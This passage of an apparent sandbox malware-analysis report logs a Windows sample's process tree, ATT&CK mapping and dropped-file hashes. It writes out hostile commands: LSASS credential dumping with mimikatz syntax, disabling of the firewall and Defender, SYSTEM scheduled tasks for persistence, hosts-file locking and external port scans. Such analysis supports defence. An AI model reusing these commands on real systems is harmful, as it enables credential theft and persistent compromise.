- - C:\Windows\rvficvimb\etmcietlm\wpcap.exe
    C:\Windows\rvficvimb\etmcietlm\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2172
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4604
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3008
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5028
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2868
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4656
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:992
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      PID:880
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1124
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4128
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4560
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:5096
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1584
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2652
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:2964
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\rvficvimb\etmcietlm\fevqvtzqb.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\rvficvimb\etmcietlm\Scant.txt
  2⤵
  PID:2300
- - C:\Windows\rvficvimb\etmcietlm\fevqvtzqb.exe
    C:\Windows\rvficvimb\etmcietlm\fevqvtzqb.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\rvficvimb\etmcietlm\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\rvficvimb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\rvficvimb\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:2264
- - C:\Windows\rvficvimb\Corporate\vfshost.exe
    C:\Windows\rvficvimb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:656
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lseyiqrwt" /ru system /tr "cmd /c C:\Windows\ime\vbhcins.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2648
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "lseyiqrwt" /ru system /tr "cmd /c C:\Windows\ime\vbhcins.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2484
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "byizcvclt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\cqeebcbu\vbhcins.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3956
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "byizcvclt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\cqeebcbu\vbhcins.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4912
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "qbkuqblyt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\zkntmqvkv\ipqbtt.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3008
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "qbkuqblyt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\zkntmqvkv\ipqbtt.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3668
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:1072
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2444
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3748
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1192
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:5008
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1536
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4980
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2244
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4508
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1584
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4764
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4616
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  PID:4636
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    PID:4988
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      System Location Discovery: System Language Discovery
      PID:4924
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  PID:2600
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  PID:1212
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  PID:4604
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2144
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      PID:992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2308
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2512
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      System Location Discovery: System Language Discovery
      PID:3228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  PID:1216
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    PID:2304
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      System Location Discovery: System Language Discovery
      PID:880
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4448
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2444
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4420
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:1788
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1072
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4720
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4304
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    PID:3468
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2564
- C:\Windows\TEMP\rvficvimb\fqqvlziek.exe
  C:\Windows\TEMP\rvficvimb\fqqvlziek.exe -accepteula -mp 792 C:\Windows\TEMP\rvficvimb\792.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4760
- C:\Windows\TEMP\rvficvimb\fqqvlziek.exe
  C:\Windows\TEMP\rvficvimb\fqqvlziek.exe -accepteula -mp 316 C:\Windows\TEMP\rvficvimb\316.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2796
- C:\Windows\TEMP\rvficvimb\fqqvlziek.exe
  C:\Windows\TEMP\rvficvimb\fqqvlziek.exe -accepteula -mp 2136 C:\Windows\TEMP\rvficvimb\2136.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1984
- C:\Windows\TEMP\rvficvimb\fqqvlziek.exe
  C:\Windows\TEMP\rvficvimb\fqqvlziek.exe -accepteula -mp 2728 C:\Windows\TEMP\rvficvimb\2728.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2340
- C:\Windows\TEMP\rvficvimb\fqqvlziek.exe
  C:\Windows\TEMP\rvficvimb\fqqvlziek.exe -accepteula -mp 2768 C:\Windows\TEMP\rvficvimb\2768.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1936
- C:\Windows\TEMP\rvficvimb\fqqvlziek.exe
  C:\Windows\TEMP\rvficvimb\fqqvlziek.exe -accepteula -mp 3064 C:\Windows\TEMP\rvficvimb\3064.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2948
- C:\Windows\TEMP\rvficvimb\fqqvlziek.exe
  C:\Windows\TEMP\rvficvimb\fqqvlziek.exe -accepteula -mp 2736 C:\Windows\TEMP\rvficvimb\2736.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1072
- C:\Windows\TEMP\rvficvimb\fqqvlziek.exe
  C:\Windows\TEMP\rvficvimb\fqqvlziek.exe -accepteula -mp 3732 C:\Windows\TEMP\rvficvimb\3732.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:992
- C:\Windows\TEMP\rvficvimb\fqqvlziek.exe
  C:\Windows\TEMP\rvficvimb\fqqvlziek.exe -accepteula -mp 3848 C:\Windows\TEMP\rvficvimb\3848.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:948
- C:\Windows\TEMP\rvficvimb\fqqvlziek.exe
  C:\Windows\TEMP\rvficvimb\fqqvlziek.exe -accepteula -mp 3920 C:\Windows\TEMP\rvficvimb\3920.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1596
- C:\Windows\TEMP\rvficvimb\fqqvlziek.exe
  C:\Windows\TEMP\rvficvimb\fqqvlziek.exe -accepteula -mp 3992 C:\Windows\TEMP\rvficvimb\3992.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3024
- C:\Windows\TEMP\rvficvimb\fqqvlziek.exe
  C:\Windows\TEMP\rvficvimb\fqqvlziek.exe -accepteula -mp 4012 C:\Windows\TEMP\rvficvimb\4012.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3612
- C:\Windows\TEMP\rvficvimb\fqqvlziek.exe
  C:\Windows\TEMP\rvficvimb\fqqvlziek.exe -accepteula -mp 1172 C:\Windows\TEMP\rvficvimb\1172.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2172
- C:\Windows\TEMP\rvficvimb\fqqvlziek.exe
  C:\Windows\TEMP\rvficvimb\fqqvlziek.exe -accepteula -mp 3636 C:\Windows\TEMP\rvficvimb\3636.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3304
- C:\Windows\TEMP\rvficvimb\fqqvlziek.exe
  C:\Windows\TEMP\rvficvimb\fqqvlziek.exe -accepteula -mp 228 C:\Windows\TEMP\rvficvimb\228.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1472
- C:\Windows\TEMP\rvficvimb\fqqvlziek.exe
  C:\Windows\TEMP\rvficvimb\fqqvlziek.exe -accepteula -mp 4572 C:\Windows\TEMP\rvficvimb\4572.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4604
- C:\Windows\TEMP\rvficvimb\fqqvlziek.exe
  C:\Windows\TEMP\rvficvimb\fqqvlziek.exe -accepteula -mp 1904 C:\Windows\TEMP\rvficvimb\1904.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4900
- C:\Windows\TEMP\rvficvimb\fqqvlziek.exe
  C:\Windows\TEMP\rvficvimb\fqqvlziek.exe -accepteula -mp 4676 C:\Windows\TEMP\rvficvimb\4676.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4852
- C:\Windows\TEMP\rvficvimb\fqqvlziek.exe
  C:\Windows\TEMP\rvficvimb\fqqvlziek.exe -accepteula -mp 744 C:\Windows\TEMP\rvficvimb\744.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:32
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\rvficvimb\etmcietlm\scan.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1216
- - C:\Windows\rvficvimb\etmcietlm\idcvbmkyl.exe
    idcvbmkyl.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:5008
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  PID:5196
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4788
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:5152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5028
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:992
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:5368

C:\Windows\SysWOW64\cuwouc.exe
C:\Windows\SysWOW64\cuwouc.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3224

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\vbhcins.exe
1⤵
PID:380
- C:\Windows\ime\vbhcins.exe
  C:\Windows\ime\vbhcins.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1684

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\zkntmqvkv\ipqbtt.exe /p everyone:F
1⤵
PID:1720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:4440
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\zkntmqvkv\ipqbtt.exe /p everyone:F
  2⤵
  PID:4152

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\cqeebcbu\vbhcins.exe /p everyone:F
1⤵
PID:1936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:3088
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\cqeebcbu\vbhcins.exe /p everyone:F
  2⤵
  PID:4992

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

OS Credential Dumping

T1003

LSASS Memory

T1003.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\rvficvimb\1172.dmp

Filesize
25.8MB

MD5
c08a607c0bbef95b54b4017d20733919

SHA1
86dcdc14e09a0bc47d90dfb33b844ec5bca43db1

SHA256
e80045fa99943124a2c2d4f4c736d0c157bfb905056a148c32ce85b2ac100384

SHA512
3a85e4fdb4648279b07b144fd601d93e6c9590b6b23cfabff742b2611401b55e8dfe0238d5c7db25e877eec2dc6375f037f88820a14f6b6a4647308bb70d2784

Download Submit
C:\Windows\TEMP\rvficvimb\2136.dmp

Filesize
4.3MB

MD5
00f7d138a863da88f2ab83b075af0378

SHA1
00bb82debfc079a3d574e8a0daf4118f4de745ab

SHA256
7dc4b802353a67accaf281f5f52b5e7c3d4d8a0392549b3b6e070e1f0bb46254

SHA512
d04001f43d0b68bf31315c607a0c49a88c7a6c5cac29517e5fc3ac4bd039d2457c06966df7b15af749526d6e05198b1d37943f3f57e3b41e04b3aca1f4756f8a

Download Submit
C:\Windows\TEMP\rvficvimb\228.dmp

Filesize
2.6MB

MD5
4c006b55285b25f3505ac096351be390

SHA1
1ce1e2ff0e2395576a86c948d1b7e6695efbaf0d

SHA256
6b72b7e4387ba6c27ba3a1c019269f9ee4adfb19f0967790e7d594c721d5732f

SHA512
344f969e6e5b5b3d0b9903942ff5035216a88322f706a79238f0b7275a2015d42294ff572e94bb200b64befcdfc7042a46b18b4b2de68297b0e5270d4463cd44

Download Submit
C:\Windows\TEMP\rvficvimb\2728.dmp

Filesize
7.5MB

MD5
cf4ddf54839b77f2949514e5031a423a

SHA1
8bbface16d9cfb1bd74b408225e1b055077d81a8

SHA256
6d1041805e446e4c5c7139c821059ed5a20f9a7e7febac25ddbe18bba2830bf7

SHA512
571f4639b51657851d5c3df9d443d839737fa0bfc52a3cb0d7c589d54b4eec299369eb0300ccd315b05444401b0fff109965b1cebb46401e21f690abcf838e44

Download Submit
C:\Windows\TEMP\rvficvimb\2736.dmp

Filesize
810KB

MD5
cb90a829b5c12c27a9a09a6070838e65

SHA1
0f47fdb463a7fefcd6d5678882b6b619b2fd22a7

SHA256
a1ee07df4b7397cc496c3279f8dd7b02149c24245d3cf705ed60ee1b162c9fee

SHA512
0e3057f1e41d568e97b58fa36bd3d59745eea6536cd4e5730dd91d71115d1de6f1c2b030a7b55cd52edef42bbd14f8ca9e6b0d618f7005ee715f0c0b4b053381

Download Submit
C:\Windows\TEMP\rvficvimb\2768.dmp

Filesize
4.1MB

MD5
22ce50c35213517ff09a43e6f9548a7c

SHA1
e49b4199c5b261ced96f5e56445eed4de58d3921

SHA256
7d017bc1bab48bb12ec3c4d3c70d5f3d66cd97bd027944600ef4721b420e55e9

SHA512
122df591660c3810bb2a8d3c38d5296a90a02e79123100eb5a1ac4fc475cb9724b2ffecd17e43b56fecb3a894431fffc7f53347621e4006ebd1905d61416a54f

Download Submit
C:\Windows\TEMP\rvficvimb\3064.dmp

Filesize
3.0MB

MD5
f5070a375f60f756d891937318b805ff

SHA1
18fe82810b09ff5c0a3338b93cb2f22971cbfb5f

SHA256
406d034f2515a20548c35454b7e5734b2df299a4b137357b927fae97d55f87d5

SHA512
2c96ced0a92ee97f3fd91d96e3975ab29b8c606114bb58787469ba059bd472eff922e7d9d493002715ead6aad8eeeb08f9f841c8c29c39bd6cee07414bb13a9e

Download Submit
C:\Windows\TEMP\rvficvimb\316.dmp

Filesize
33.8MB

MD5
7b04e02878bc532ee2199069cace42e2

SHA1
e6e5056ef3361439a5cb03221178054c28f75e49

SHA256
32c70c2a82aea26931594c86b9a0855b27a3a25b823cbf8e19903b1769c4ecf9

SHA512
e93cf75f649d6d20c020e68812629d814a7dd538c1f0b60876a5c9dce0b97885d78c4d64a1fc17c3769734ea4095e06327264a30d43d4c8ee7c53a170788296b

Download Submit
C:\Windows\TEMP\rvficvimb\3636.dmp

Filesize
8.7MB

MD5
343cacca74d0d94a5fa0b0d9b359ae4c

SHA1
3bb27ae4d2616cb16ff539e729eb2c51464ca7eb

SHA256
7d3d7427b9ceae0b028c519812255965588602c157e0da4aa9d10b356a865982

SHA512
acd40eef42e0b2c8b4d9fba09cee08ec4f4e6619c01cece9007fabc61783f60921e21ea45159d316fc3db47cdd7389fd4935baa9f5353b2aa9d156f7773939a7

Download Submit
C:\Windows\TEMP\rvficvimb\3732.dmp

Filesize
2.4MB

MD5
17df532d87b9720d28432cba34a59aa4

SHA1
6cea9cad827d397e55a99273078b41b6d99bd518

SHA256
ce1315217ba31dd86c3a44524da95f8b4c9d932fffaa9157cf3be3379c08dcd8

SHA512
378a20990bb64e20a473b42a1818ccbf641226bcd7210d743d7a5751210413060c471d556d31e8e6402683f4e359561b56d36600d39ce493d8f03fa96e51b7b4

Download Submit
C:\Windows\TEMP\rvficvimb\3848.dmp

Filesize
20.9MB

MD5
0e2883865567303f72cfcf73b24585ec

SHA1
bb7ced01529e7b0122840c8bf3b5d49a9c1b2cfa

SHA256
6272ca0396a46a7f92fe20784791f397e43a0a07ff837b59117ee42e6dc22539

SHA512
a936ab78565677652123e6b2b90fac24aaf61181be4d56b5439d870ac6a5294baab05519f54781a5d3f50a41dc552d59a55a53560e9f9553538be633709d5461

Download Submit
C:\Windows\TEMP\rvficvimb\3920.dmp

Filesize
4.6MB

MD5
c88dee03e63f7a532cae2047648e22c2

SHA1
e4af85b09992920116f889a81944a2b4d1c27894

SHA256
60c477ca54f67a3cf59ea5a10f4dafbb8c1dfb81cc704253163ec0a4ab599873

SHA512
24d164cf5cdb93dc909703e12ef92a6b490488fe788dd5ca69a05f1713fe7ce842a845d120a9ebac8050beffce45b471891530ba13088f4d43c4489a70095bae

Download Submit
C:\Windows\TEMP\rvficvimb\3992.dmp

Filesize
45.5MB

MD5
57caa66a340605421e6904f05902b45e

SHA1
2c0924ed0b54b8378dcb5550dbf7da8382496b2b

SHA256
14aa2a8f086322506f1e997c38a717cb13f5bc19f1c38f514a266ed099ecb0a8

SHA512
68ac1e0fa4f2931301c9887ec565a40989e4c615bd4815d4d2f911ea032fac4d713c1e592db8af8aa21c3aea82a69b6f43ad17c205cc36f38f387631b96d85b1

Download Submit
C:\Windows\TEMP\rvficvimb\4012.dmp

Filesize
1.2MB

MD5
6fcf7fdd4c3c7036dceb5f52dc8e0c95

SHA1
a2e322c90f08b2b233b839f033ef79c31b62b72d

SHA256
2eb59059f8fe0d8e5195021a24f87089eef0b2e2f9aea69f9c657ed83d17cf9c

SHA512
850a58cee796246b06e4c371e11b8353bd3f534a04fcb56d07a18f14963821c8cbeb1cb9ad68aab3554cc058bc04ad65fe68edc8611c8f045a0320d0898cff56

Download Submit
C:\Windows\TEMP\rvficvimb\792.dmp

Filesize
1019KB

MD5
8f6c06d372ed9fd35e4364a39974b2b9

SHA1
84a206cb50fe00b6bda642d1266eaedcde8407e5

SHA256
